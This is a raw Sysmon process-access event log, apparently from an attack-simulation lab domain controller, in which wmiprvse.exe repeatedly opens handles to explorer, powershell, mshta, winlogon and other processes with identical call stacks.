16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5382-6008-8506-00000000A301}6424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5382-6008-8406-00000000A301}6456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5382-6008-8306-00000000A301}4312C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.302{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.287{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 